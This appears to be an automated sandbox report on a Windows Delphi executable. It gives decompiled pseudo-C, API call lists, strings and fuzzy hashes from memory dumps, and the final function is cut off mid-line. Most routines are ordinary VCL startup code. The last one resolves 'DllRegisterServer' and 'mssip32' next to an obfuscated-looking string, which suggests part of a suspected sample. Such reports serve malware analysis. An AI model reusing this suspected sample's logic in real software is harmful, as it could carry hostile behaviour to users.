0x004566c5 0x00000000 0x004566ca 0x00456145 0x00456148 0x004562cd 0x004562d3 0x004562d6 0x004562da 0x004562e0 0x004562e6 0x004562e9 0x004562ed 0x00456314 0x00456329 0x004562ef 0x004562f2 0x00456307 0x00456307 0x00000000 0x0045614e 0x00000000 0x0045614e 0x00456148 0x004560ca 0x00456286 0x0045628d 0x00000000 0x00456292 0x004560d0 0x004560d3 0x00000000 0x00000000 0x004560d9 0x00000000 0x004566ee 0x00000000 0x00000000 0x00000000 0x00000000 0x004562ab 0x004562ad 0x004562af 0x004562b7 0x004562ba 0x004562bb 0x004562c1 0x00000000 0x00000000 0x00456333 0x00456336 0x0045633a 0x00456377 0x0045637d 0x00456380 0x00456387 0x00456389 0x00456390 0x00456392 0x00456395 0x00456398 0x0045639d 0x004563a0 0x004563a0 0x00456390 0x004563a9 0x0045633c 0x0045633c 0x00456343 0x00456348 0x0045634d 0x00456350 0x00456356 0x00456358 0x0045635f 0x00456362 0x00456362 0x00456364 0x00456364 0x00456358 0x0045636b 0x00456370 0x00000000 0x00000000 0x0045625b 0x0045625e 0x00456261 0x00456262 0x00456267 0x00456269 0x00456278 0x0045626b 0x0045626c 0x00456271 0x00000000 0x00000000 0x00456243 0x00456246 0x00456249 0x0045624b 0x00456251 0x00456251 0x00000000 0x00000000 0x004563fb 0x004563fe 0x00000000 0x00000000 0x00456072 0x00456072 0x00456073 0x00000000 0x00456075 0x00456091 0x00000000 0x00456093 0x00456093 0x00456095 0x00456098 0x00456098 0x0045671b 0x00456721 0x004560a0 0x004560a0 0x004560a1 0x004560a1 0x004560a2 0x00000000 0x00000000 0x00000000 0x004560a2

Strings

dF , xrefs: 004566AD vcltest3.dll , xrefs: 0045643D RegisterAutomation , xrefs: 0045645E

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: String ID: RegisterAutomation$vcltest3.dll$dF API String ID: 0-2619585711 Opcode ID: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8 Instruction ID: c862d983367047c7d83d43d7369f119c2f1ed98460a64e58c2bee91e03f6acd7 Opcode Fuzzy Hash: bebbeda00556289de3349cc0c43b19427dd01e6f62d31d66b9211dfcce096cd8 Instruction Fuzzy Hash: D0E18074A00204EFD700DF69C585A5EB7F1AF08315FA681AAEC049B367C739EE49DB09

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 41%

E00455934(void* __eax, void* __ebx, void* __ecx) { struct _WNDCLASSA _v44; char _v48; char* _t22; CHAR* _t26; struct HINSTANCE__* _t27; intOrPtr* _t29; signed int _t32; intOrPtr* _t33; signed int _t36; struct HINSTANCE__* _t37; void* _t39; CHAR* _t40; struct HWND__* _t41; char* _t47; char* _t52; long _t55; long _t59; struct HINSTANCE__* _t62; intOrPtr _t64; void* _t69; struct HMENU__* _t70; intOrPtr _t77; void* _t83; short _t88; _v48 = 0; _t69 = __eax; _push(_t83); _push(0x455ad5); _push( *[fs:eax]); *[fs:eax] = _t83 + 0xffffffd4; if( *((char*)(__eax + 0xac)) != 0) { L13: _pop(_t77); *[fs:eax] = _t77; _push(0x455adc); return E0040473C( &_v48); } _t22 = *0x462e14; // 0x46304c if( *_t22 != 0) { goto L13; } *(_t69 + 0x40) = E00421724(E0045603C, __eax); *0x4627b4 = L00406E54; _t26 = *0x4627d4; // 0x4555d0 _t27 = *0x4657f8; // 0x400000 if(GetClassInfoA(_t27, _t26, &_v44) == 0) { _t62 = *0x4657f8; // 0x400000 *0x4627c0 = _t62; _t88 = RegisterClassA(0x4627b0); if(_t88 == 0) { _t64 = *0x462b54; // 0x423558 E00406740(_t64, &_v48); E0040C11C(_v48, 1); E00404184(); } } _t29 = *0x462c28; // 0x466310 _t32 = *((intOrPtr*)( *_t29))(0) >> 1; if(_t88 < 0) { asm("adc eax, 0x0"); } _t33 = *0x462c28; // 0x466310 _t36 = *((intOrPtr*)( *_t33))(1, _t32) >> 1; if(_t88 < 0) { asm("adc eax, 0x0"); } _push(_t36); _push(0); _push(0); _push(0); _push(0); _t37 = *0x4657f8; // 0x400000 _push(_t37); _push(0); _t7 = _t69 + 0x8c; // 0x69746163 _t39 = E00404C00( *_t7); _t40 = *0x4627d4; // 0x4555d0, executed _t41 = E00407364(_t40, _t39); // executed *(_t69 + 0x30) = _t41; _t9 = _t69 + 0x8c; // 0x44c90c E0040473C(_t9); *((char*)(_t69 + 0xac)) = 1; _t11 = _t69 + 0x40; // 0x10cc0000 _t12 = _t69 + 0x30; // 0xe SetWindowLongA( *_t12, 0xfffffffc, *_t11); _t47 = *0x462cb4; // 0x4664f8 if( *_t47 != 0) { _t55 = E00456750(_t69); _t13 = _t69 + 0x30; // 0xe SendMessageA( *_t13, 0x80, 1, _t55); // executed _t59 = E00456750(_t69); _t14 = _t69 + 0x30; // 0xe SetClassLongA( *_t14, 0xfffffff2, _t59); } _t15 = _t69 + 0x30; // 0xe _t70 = GetSystemMenu( *_t15, 0); DeleteMenu(_t70, 0xf030, 0); DeleteMenu(_t70, 0xf000, 0); _t52 = *0x462cb4; // 0x4664f8 if( *_t52 != 0) { DeleteMenu(_t70, 0xf010, 0); } goto L13; } 0x0045593d 0x00455940 0x00455944 0x00455945 0x0045594a 0x0045594d 0x00455957 0x00455abf 0x00455ac1 0x00455ac4 0x00455ac7 0x00455ad4 0x00455ad4 0x0045595d 0x00455965 0x00000000 0x00000000 0x00455976 0x0045597e 0x00455987 0x0045598d 0x0045599a 0x0045599c 0x004559a1 0x004559b0 0x004559b3 0x004559b8 0x004559bd 0x004559cc 0x004559d1 0x004559d1 0x004559b3 0x004559d8 0x004559e1 0x004559e3 0x004559e5 0x004559e5 0x004559eb 0x004559f4 0x004559f6 0x004559f8 0x004559f8 0x004559fb 0x004559fc 0x004559fe 0x00455a00 0x00455a02 0x00455a04 0x00455a09 0x00455a0a 0x00455a0c 0x00455a12 0x00455a1e 0x00455a23 0x00455a28 0x00455a2b 0x00455a31 0x00455a36 0x00455a3d 0x00455a43 0x00455a47 0x00455a4c 0x00455a54 0x00455a58 0x00455a65 0x00455a69 0x00455a70 0x00455a78 0x00455a7c 0x00455a7c 0x00455a83 0x00455a8c 0x00455a96 0x00455aa3 0x00455aa8 0x00455ab0 0x00455aba 0x00455aba 0x00000000

APIs

Part of subcall function 00421724: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742 GetClassInfoA.USER32 ref: 00455993 RegisterClassA.USER32 ref: 004559AB Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772 SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47 SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69 SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A7C GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A87 DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455A96 DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455AA3 DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10CC0000,0044C880), ref: 00455ABA

Strings

Tn@ , xrefs: 0045597E L0F , xrefs: 0045595D X5B , xrefs: 004559B8

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow String ID: L0F$Tn@$X5B API String ID: 2103932818-3306811505 Opcode ID: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87 Instruction ID: 8b2a45e2b46d75add65d1c0541aee3cefa7279e0c305bd2f6c4295ac0c4b2ff4 Opcode Fuzzy Hash: 1061d3b833ce9895d9cf07967922cd786b4ec16f4d71d80d9c33e4b0a42dfe87 Instruction Fuzzy Hash: 62418070600700AFE710EF69DD92F6A3399AB04715F55417AFD00EB2D3EAB9AC448B6D

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%

E004478D4(void* __ebx, void* __edi, void* __eflags) { char _v8; char _v12; char _v16; char _v20; char _v24; long _v28; char _v32; char _v36; intOrPtr _t25; short _t27; char _t29; intOrPtr _t35; intOrPtr _t38; intOrPtr _t47; intOrPtr _t49; intOrPtr* _t50; intOrPtr _t53; struct HINSTANCE__* _t63; intOrPtr* _t78; intOrPtr* _t80; intOrPtr _t83; void* _t87; _v20 = 0; _v8 = 0; _push(_t87); _push(0x447a4c); _push( *[fs:eax]); *[fs:eax] = _t87 + 0xffffffe0; _v16 = GetCurrentProcessId(); _v12 = 0; E0040970C("Delphi%.8X", 0, &_v16, &_v8); E00404790(0x466504, _v8); _t25 = *0x466504; // 0x270a898 _t27 = GlobalAddAtomA(E00404C00(_t25)); // executed *0x466500 = _t27; _t29 = *0x4657f8; // 0x400000 _v36 = _t29; _v32 = 0; _v28 = GetCurrentThreadId(); _v24 = 0; E0040970C("ControlOfs%.8X%.8X", 1, &_v36, &_v20); E00404790(0x466508, _v20); _t35 = *0x466508; // 0x2711cc0 *0x466502 = GlobalAddAtomA(E00404C00(_t35)); _t38 = *0x466508; // 0x2711cc0 *0x46650c = RegisterWindowMessageA(E00404C00(_t38)); *0x466544 = E0041AA24(1); E004474DC(); *0x4664ec = E00447288(1, 1); _t47 = E004543D8(1, __edi); _t78 = *0x462f14; // 0x466584 *_t78 = _t47; _t49 = E004555E0(0, 1); _t80 = *0x462da4; // 0x466580 *_t80 = _t49; _t50 = *0x462da4; // 0x466580 E00457684( *_t50, 1); _t53 = *0x434ea4; // 0x434ea8 E0041A1CC(_t53, 0x4376cc, 0x4376dc); _t63 = GetModuleHandleA("USER32"); if(_t63 != 0) { *0x46255c = GetProcAddress(_t63, "AnimateWindow"); } _pop(_t83); *[fs:eax] = _t83; _push(0x447a53); E0040473C( &_v20); return E0040473C( &_v8); } 0x004478dd 0x004478e0 0x004478e5 0x004478e6 0x004478eb 0x004478ee 0x004478fa 0x004478fd 0x0044790b 0x00447918 0x0044791d 0x00447928 0x0044792d 0x00447937 0x0044793c 0x0044793f 0x00447948 0x0044794b 0x0044795c 0x00447969 0x0044796e 0x0044797e 0x00447984 0x00447994 0x004479a5 0x004479aa 0x004479bb 0x004479c9 0x004479ce 0x004479d4 0x004479df 0x004479e4 0x004479ea 0x004479ec 0x004479f5 0x00447a04 0x00447a09 0x00447a18 0x00447a1c 0x00447a29 0x00447a29 0x00447a30 0x00447a33 0x00447a36 0x00447a3e 0x00447a4b

APIs

GetCurrentProcessId.KERNEL32(?,00000000,00447A4C), ref: 004478F5 GlobalAddAtomA.KERNEL32 ref: 00447928 GetCurrentThreadId.KERNEL32 ref: 00447943 GlobalAddAtomA.KERNEL32 ref: 00447979 RegisterWindowMessageA.USER32(00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0044798F Part of subcall function 0041AA24: InitializeCriticalSection.KERNEL32(00418518,?,?,004479A5,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 0041AA43 Part of subcall function 004474DC: SetErrorMode.KERNEL32(00008000), ref: 004474F5 Part of subcall function 004474DC: GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526 Part of subcall function 004474DC: LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7 Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C Part of subcall function 004474DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621 Part of subcall function 004474DC: SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C Part of subcall function 004543D8: GetKeyboardLayout.USER32 ref: 0045441D Part of subcall function 004543D8: GetDC.USER32(00000000), ref: 00454472 Part of subcall function 004543D8: GetDeviceCaps.GDI32(00000000,0000005A), ref: 0045447C Part of subcall function 004543D8: ReleaseDC.USER32 ref: 00454487 Part of subcall function 004555E0: LoadIconA.USER32 ref: 004556D7 Part of subcall function 004555E0: GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709 Part of subcall function 004555E0: OemToCharA.USER32 ref: 0045571C Part of subcall function 004555E0: CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B Part of subcall function 004555E0: CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761 GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00447A13 GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00447A24

Strings

ControlOfs%.8X%.8X , xrefs: 00447957 AnimateWindow , xrefs: 00447A1E 0sC , xrefs: 004479B1 USER32 , xrefs: 00447A0E Delphi%.8X , xrefs: 00447906

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$CharModule$AtomCurrentErrorGlobalHandleLoadMode$CapsCriticalDeviceFileIconInitializeKeyboardLayoutLibraryLowerMessageNameNextProcessRegisterReleaseSectionThreadWindow String ID: 0sC$AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32 API String ID: 1515865724-1439261924 Opcode ID: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6 Instruction ID: dcfdd3a89ae3525500325092b6b3c25abddc81a31b1afbe156e43ea57f3249c9 Opcode Fuzzy Hash: 1cab24320c825aae389d2ad9d806f951871264bbd0d0d4677ce10ca45a00fae6 Instruction Fuzzy Hash: 634193B0604205AFD700EFA9ED42A8D77F5EB44308B01457BF401F73A2EB79A9008B5E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 91%

E004555E0(void* __ecx, char __edx) { char _v5; char _v261; void* __ebx; void* __ebp; intOrPtr _t42; intOrPtr _t45; intOrPtr _t46; struct HINSTANCE__** _t58; intOrPtr _t63; struct HINSTANCE__** _t65; void* _t72; char* _t74; CHAR* _t76; intOrPtr _t80; char* _t81; intOrPtr _t87; intOrPtr* _t94; intOrPtr* _t95; intOrPtr _t96; void* _t97; char _t99; void* _t111; void* _t112; _t99 = __edx; _t97 = __ecx; if(__edx != 0) { _t112 = _t112 + 0xfffffff0; _t42 = E00403C34(_t42, _t111); } _v5 = _t99; _t96 = _t42; E00420664(_t97, 0); _t45 = *0x462d08; // 0x461bc8 if( *((short*)(_t45 + 2)) == 0) { _t95 = *0x462d08; // 0x461bc8 *((intOrPtr*)(_t95 + 4)) = _t96; *_t95 = 0x457090; } _t46 = *0x462dc0; // 0x461bd0 if( *((short*)(_t46 + 2)) == 0) { _t94 = *0x462dc0; // 0x461bd0 *((intOrPtr*)(_t94 + 4)) = _t96; *_t94 = E0045729C; } *((char*)(_t96 + 0x34)) = 0; *((intOrPtr*)(_t96 + 0x90)) = E004038F8(1); *((intOrPtr*)(_t96 + 0x98)) = E004038F8(1); *((intOrPtr*)(_t96 + 0xb0)) = E004038F8(1); *((intOrPtr*)(_t96 + 0x60)) = 0; *((intOrPtr*)(_t96 + 0x84)) = 0; *((intOrPtr*)(_t96 + 0x5c)) = 0xff000018; *((intOrPtr*)(_t96 + 0x78)) = 0x1f4; *((char*)(_t96 + 0x7c)) = 1; *((intOrPtr*)(_t96 + 0x80)) = 0; *((intOrPtr*)(_t96 + 0x74)) = 0x9c4; *((char*)(_t96 + 0x88)) = 0; *((char*)(_t96 + 0xa5)) = 1; *((char*)(_t96 + 0xbc)) = 1; _t110 = E0042A7FC(1); *((intOrPtr*)(_t96 + 0xa0)) = _t57; _t58 = *0x462c04; // 0x463030 E0042ABD0(_t110, LoadIconA( *_t58, "MAINICON")); _t21 = _t96 + 0xa0; // 0x736d _t63 = *_t21; *((intOrPtr*)(_t63 + 0x14)) = _t96; *((intOrPtr*)(_t63 + 0x10)) = 0x45795c; _t65 = *0x462c04; // 0x463030 GetModuleFileNameA( *_t65, &_v261, 0x100); OemToCharA( &_v261, &_v261); _t72 = E0040CEC8( &_v261, 0x5c); if(_t72 != 0) { _t28 = _t72 + 1; // 0x1 E00409044( &_v261, _t28); } _t74 = E0040CEFC( &_v261, 0x2e); if(_t74 != 0) { *_t74 = 0; } _t76 = CharNextA( &_v261); // executed CharLowerA(_t76); _t32 = _t96 + 0x8c; // 0x44c90c E004049AC(_t32, 0x100, &_v261); *((char*)(_t96 + 0xd4)) = 0; _t80 = E004217E0(0x456bf0, _t96); // executed *((intOrPtr*)(_t96 + 0xc8)) = _t80; _t81 = *0x462adc; // 0x463038 if( *_t81 == 0) { E00455934(_t96, _t96, 0x100); // executed } *((char*)(_t96 + 0x59)) = 1; *((char*)(_t96 + 0x5a)) = 1; *((char*)(_t96 + 0x5b)) = 1; *((char*)(_t96 + 0xa6)) = 1; *((intOrPtr*)(_t96 + 0xa8)) = 0; E00457B38(_t96, 0x100); E00458698(_t96); _t87 = _t96; if(_v5 != 0) { E00403C8C(_t87); _pop( *[fs:0x0]); } return _t96; } 0x004555e0 0x004555e0 0x004555ed 0x004555ef 0x004555f2 0x004555f2 0x004555f7 0x004555fa 0x00455600 0x00455605 0x0045560f 0x00455611 0x00455616 0x00455619 0x00455619 0x0045561f 0x00455629 0x0045562b 0x00455630 0x00455633 0x00455633 0x00455639 0x00455649 0x0045565b 0x0045566d 0x00455675 0x0045567a 0x00455680 0x00455687 0x0045568e 0x00455694 0x0045569a 0x004556a1 0x004556a8 0x004556af 0x004556c2 0x004556c4 0x004556cf 0x004556e0 0x004556e5 0x004556e5 0x004556eb 0x004556ee 0x00455701 0x00455709 0x0045571c 0x00455729 0x00455730 0x00455732 0x0045573b 0x0045573b 0x00455748 0x0045574f 0x00455751 0x00455751 0x0045575b 0x00455761 0x00455766 0x00455777 0x0045577c 0x00455789 0x0045578e 0x00455794 0x0045579c 0x004557a0 0x004557a0 0x004557a5 0x004557a9 0x004557ad 0x004557b1 0x004557ba 0x004557c2 0x004557c9 0x004557ce 0x004557d4 0x004557d6 0x004557db 0x004557e2 0x004557ec

APIs

LoadIconA.USER32 ref: 004556D7 GetModuleFileNameA.KERNEL32(00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000,?,00000000,00447A4C), ref: 00455709 OemToCharA.USER32 ref: 0045571C CharNextA.USER32(?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?,00000000), ref: 0045575B CharLowerA.USER32(00000000,?,?,?,00400000,?,00000100,00400000,MAINICON,?,?,?,004479E4,00000000,00000000,?), ref: 00455761 Part of subcall function 00455934: GetClassInfoA.USER32 ref: 00455993 Part of subcall function 00455934: RegisterClassA.USER32 ref: 004559AB Part of subcall function 00455934: SetWindowLongA.USER32(0000000E,000000FC,10CC0000), ref: 00455A47 Part of subcall function 00455934: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 00455A69

Strings

00F , xrefs: 004556CF, 00455701 MAINICON , xrefs: 004556CA 80F , xrefs: 00455794

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow String ID: 00F$80F$MAINICON API String ID: 2763768735-2155582179 Opcode ID: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a Instruction ID: 3d65150858da70b31048973324385ee2371e73c537065fabeb210eff4a88cc2d Opcode Fuzzy Hash: 140bc95ab58d9b9ad052038345c73fd038fbbacc063635515f1d9b8afcd3790a Instruction Fuzzy Hash: B2516F706042849FDB10EF39D885B867BE4AF15308F4440BAEC48DF397DBB99948CB69

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E0040D05C(void* __ebx, void* __edx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; char _v24; char _v28; char _v32; char _v36; char _v40; char _v44; char _v48; char _v52; char _v56; char _v60; char _v64; char _v68; void* _t104; void* _t111; void* _t133; intOrPtr _t183; intOrPtr _t193; intOrPtr _t194; _t191 = __esi; _t190 = __edi; _t193 = _t194; _t133 = 8; do { _push(0); _push(0); _t133 = _t133 - 1; } while (_t133 != 0); _push(__ebx); _push(_t193); _push(0x40d327); _push( *[fs:eax]); *[fs:eax] = _t194; // executed E0040CF98(); // executed E0040BA08(__ebx, __edi, __esi); _t196 = *0x4658d4; if( *0x4658d4 != 0) { E0040BBE0(__esi, _t196); } _t132 = GetThreadLocale(); E0040B954(_t43, 0, 0x14, &_v20); E00404790(0x465808, _v20); E0040B954(_t43, 0x40d33c, 0x1b, &_v24); *0x46580c = E00408B44(0x40d33c, 0, _t196); E0040B954(_t132, 0x40d33c, 0x1c, &_v28); *0x46580d = E00408B44(0x40d33c, 0, _t196); *0x46580e = E0040B9A0(_t132, 0x2c, 0xf); *0x46580f = E0040B9A0(_t132, 0x2e, 0xe); E0040B954(_t132, 0x40d33c, 0x19, &_v32); *0x465810 = E00408B44(0x40d33c, 0, _t196); *0x465811 = E0040B9A0(_t132, 0x2f, 0x1d); E0040B954(_t132, "m/d/yy", 0x1f, &_v40); E0040BC90(_v40, _t132, &_v36, _t190, _t191, _t196); E00404790(0x465814, _v36); E0040B954(_t132, "mmmm d, yyyy", 0x20, &_v48); E0040BC90(_v48, _t132, &_v44, _t190, _t191, _t196); E00404790(0x465818, _v44); *0x46581c = E0040B9A0(_t132, 0x3a, 0x1e); E0040B954(_t132, 0x40d370, 0x28, &_v52); E00404790(0x465820, _v52); E0040B954(_t132, 0x40d37c, 0x29, &_v56); E00404790(0x465824, _v56); E0040473C( &_v12); E0040473C( &_v16); E0040B954(_t132, 0x40d33c, 0x25, &_v60); _t104 = E00408B44(0x40d33c, 0, _t196); _t197 = _t104; if(_t104 != 0) { E004047D4( &_v8, 0x40d394); } else { E004047D4( &_v8, 0x40d388); } E0040B954(_t132, 0x40d33c, 0x23, &_v64); _t111 = E00408B44(0x40d33c, 0, _t197); _t198 = _t111; if(_t111 == 0) { E0040B954(_t132, 0x40d33c, 0x1005, &_v68); if(E00408B44(0x40d33c, 0, _t198) != 0) { E004047D4( &_v12, 0x40d3b0); } else { E004047D4( &_v16, 0x40d3a0); } } _push(_v12); _push(_v8); _push(":mm"); _push(_v16); E00404AC0(); _push(_v12); _push(_v8); _push(":mm:ss"); _push(_v16); E00404AC0(); *0x4658d6 = E0040B9A0(_t132, 0x2c, 0xc); _pop(_t183); *[fs:eax] = _t183; _push(E0040D32E); return E00404760( &_v68, 0x10); } 0x0040d05c 0x0040d05c 0x0040d05d 0x0040d05f 0x0040d064 0x0040d064 0x0040d066 0x0040d068 0x0040d068 0x0040d06b 0x0040d06e 0x0040d06f 0x0040d074 0x0040d077 0x0040d07a 0x0040d07f 0x0040d084 0x0040d08b 0x0040d08d 0x0040d08d 0x0040d097 0x0040d0a6 0x0040d0b3 0x0040d0c8 0x0040d0d7 0x0040d0ec 0x0040d0fb 0x0040d10e 0x0040d121 0x0040d136 0x0040d145 0x0040d158 0x0040d16d 0x0040d178 0x0040d185 0x0040d19a 0x0040d1a5 0x0040d1b2 0x0040d1c5 0x0040d1da 0x0040d1e7 0x0040d1fc 0x0040d209 0x0040d211 0x0040d219 0x0040d22e 0x0040d238 0x0040d23d 0x0040d23f 0x0040d258 0x0040d241 0x0040d249 0x0040d249 0x0040d26d 0x0040d277 0x0040d27c 0x0040d27e 0x0040d290 0x0040d2a1 0x0040d2ba 0x0040d2a3 0x0040d2ab 0x0040d2ab 0x0040d2a1 0x0040d2bf 0x0040d2c2 0x0040d2c5 0x0040d2ca 0x0040d2d7 0x0040d2dc 0x0040d2df 0x0040d2e2 0x0040d2e7 0x0040d2f4 0x0040d307 0x0040d30e 0x0040d311 0x0040d314 0x0040d326

APIs

GetThreadLocale.KERNEL32(00000000,0040D327,?,?,00000000,00000000), ref: 0040D092 Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972

Strings

AMPM , xrefs: 0040D2A6 AMPM , xrefs: 0040D2B5 m/d/yy , xrefs: 0040D161 :mm , xrefs: 0040D2C5 :mm:ss , xrefs: 0040D2E2 mmmm d, yyyy , xrefs: 0040D18E

Memory Dump Source

Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp Download File Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp Download File Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp Download File Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy API String ID: 4232894706-2493093252 Opcode ID: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6 Instruction ID: c9001327b6f8c8ca4ed95205664730ab35d4fa54160187d9b8d5148293e8bd77 Opcode Fuzzy Hash: b5e0a9655523728610d75e5f6b93e2a53b5ce1a3b15ab957e18a3459b3b457b6 Instruction Fuzzy Hash: 0D615E70B001499BDB00FBE5D891A9E76A6DB88304F50D43BB601BB7C6DB3CD919879E

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 48%

E00460860(void* __ebx, void* __edi, void* __esi) { char _v8; char _v12; char _v16; char _v20; intOrPtr _v24; intOrPtr _v28; char _v32; intOrPtr* _t53; void* _t60; intOrPtr _t61; intOrPtr _t64; intOrPtr _t67; intOrPtr _t74; signed int _t75; intOrPtr _t86; signed int _t91; intOrPtr _t99; intOrPtr _t104; intOrPtr _t105; intOrPtr _t107; intOrPtr _t108; intOrPtr _t112; intOrPtr _t114; intOrPtr _t126; void* _t132; void* _t139; void* _t140; intOrPtr _t143; _t140 = __esi; _t139 = __edi; _push(0); _push(0); _push(0); _push(0); _push(0); _push(0); _push(0); _push(_t143); _push(0x460b18); _push( *[fs:eax]); *[fs:eax] = _t143; *0x46679c = *0x46679c - 1; if( *0x46679c < 0) { 0; _push(0x124f2); // executed L0045F394(); // executed if(0 == 0) { E00404790(0x466744, 0x460b44); } else { E00404790(0x466744, "rrrrrrrtutFrk"); } _t99 = *0x466744; // 0x26f5078 E00404A4C( &_v8, _t99, 0x460b50); E0045EBB0(_v8, 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed E004072FC(0x4666c8, L0045F39C); if( *0x4666d4 <= 0x206a) { 0; E0045EBB0("mssip32", 0x4666d8, 0x4666c8, "DllRegisterServer", _t140); // executed E004072FC(0x4666c8, L0045F39C); E00404AC0(); E00404934( &_v12, E00404C00(_v16)); _t104 = *0x4657f8; // 0x400000 *0x466730 = E0041CF2C(_t104, 1, 0xa, _v12); _t53 = *0x466730; // 0x270a970 *0x4666bc = *((intOrPtr*)( *_t53))(0x460b94, *0x466744, 0x460b88); _t126 = *0x4666bc; // 0x35986 E00404E88(0x466768, _t126); _t60 = E00404C58(0x466768); _t61 = *0x466730; // 0x270a970 _t7 = _t61 + 